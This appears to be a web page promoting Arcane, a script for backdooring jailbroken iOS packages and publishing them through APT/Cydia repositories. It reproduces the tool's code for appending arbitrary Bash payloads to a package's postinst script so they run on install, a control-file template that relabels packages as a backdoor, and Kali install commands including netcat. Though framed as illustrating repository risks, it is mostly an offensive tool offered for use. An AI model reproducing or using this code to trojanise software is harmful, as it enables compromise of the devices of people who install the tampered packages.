Arcane is a simple script tool to backdoor iOS packages (iPhone ARM) and create the necessary resources for APT repositories.
It was created to help illustrate why Cydia repositories can be dangerous and what post-exploitation attacks are possible from a compromised iOS device.
How Arcane Tool To Backdoor iOS Package Works
It’s possible to supply scripts as part of a package when installing or removing applications. Package maintainer scripts include the preinst, postinst, prerm
, and postrm
files. Arcane takes advantage of the postinst
file to execute commands during the installation.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 |
# The "post-installation" file. This file is generally responsible # for executing commands on the OS after installing the required # files. It's utilized by developers to manage and maintain various # aspects of an installation. Arcane abuses this functionality by # appending malicious Bash commands to the file. postinst="$tmp/DEBIAN/postinst"; # A function to handle the type of command execution embedded into the # postinst file. function inject_backdoor () { # If --file is used, `cat` the command(s) into the postinst file. if [[ "$infile" ]]; then cat "$infile" >> "$postinst"; embed="[$infile]"; else # If no --file, utilize the simple Bash payload, previously # defined. echo -e "$payload" >> "$postinst"; embed="generic shell command"; fi; status "embedded $embed into postinst" "error embedding backdoor"; chmod 0755 "$postinst" }; |
The control
file contains values that package management tools use when installing packages. Arcane will either modify an existing control
or create it.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 |
# The "control" file template. Most iOS packages will include a # control file. In the event one is not found, Arcane will use the # below template. The `$hacker` variable is used here to occupy # various arbitrary fields. # https://www.debian.org/doc/manuals/maint-guide/dreq.en.html controlTemp="Package: com.$hacker.backdoor Name: $hacker backdoor Version: 1337 Section: app Architecture: iphoneos-arm Description: A backdoored iOS package Author: $hacker <https://$hacker.github.io/> Maintainer: $hacker <https://$hacker.github.io/>"; ... # An `if` statement to check for the control file. if [[ ! -f "$tmp/DEBIAN/control" ]]; then # If no control is detected, create it using the template. echo "$controlTemp" > "$tmp/DEBIAN/control"; status "created control file" "error with control template"; else # If a control file exists, Arcane will simply rename the package # as it appears in the list of available Cydia applications. This # makes the package easier to location in Cydia. msg "detected control file" succ; sed -i '0,/^Name:.*/s//Name: $hacker backdoor/' "$tmp/DEBIAN/control"; status "modified control file" "error with control"; fi; |
How to install Arcane Tool To Backdoor iOS Packages
Recommended for Kali v2020.3:
1 2 3 4 |
sudo apt-get update; sudo apt-get install -Vy bzip2 netcat-traditional dpkg coreutils # dependencies sudo git clone https://github.com/tokyoneon/arcane /opt/arcane sudo chown $USER:$USER -R /opt/arcane/; cd /opt/arcane chmod +x arcane.sh;./arcane.sh --help |
You can download Arcane here:
Or read more here.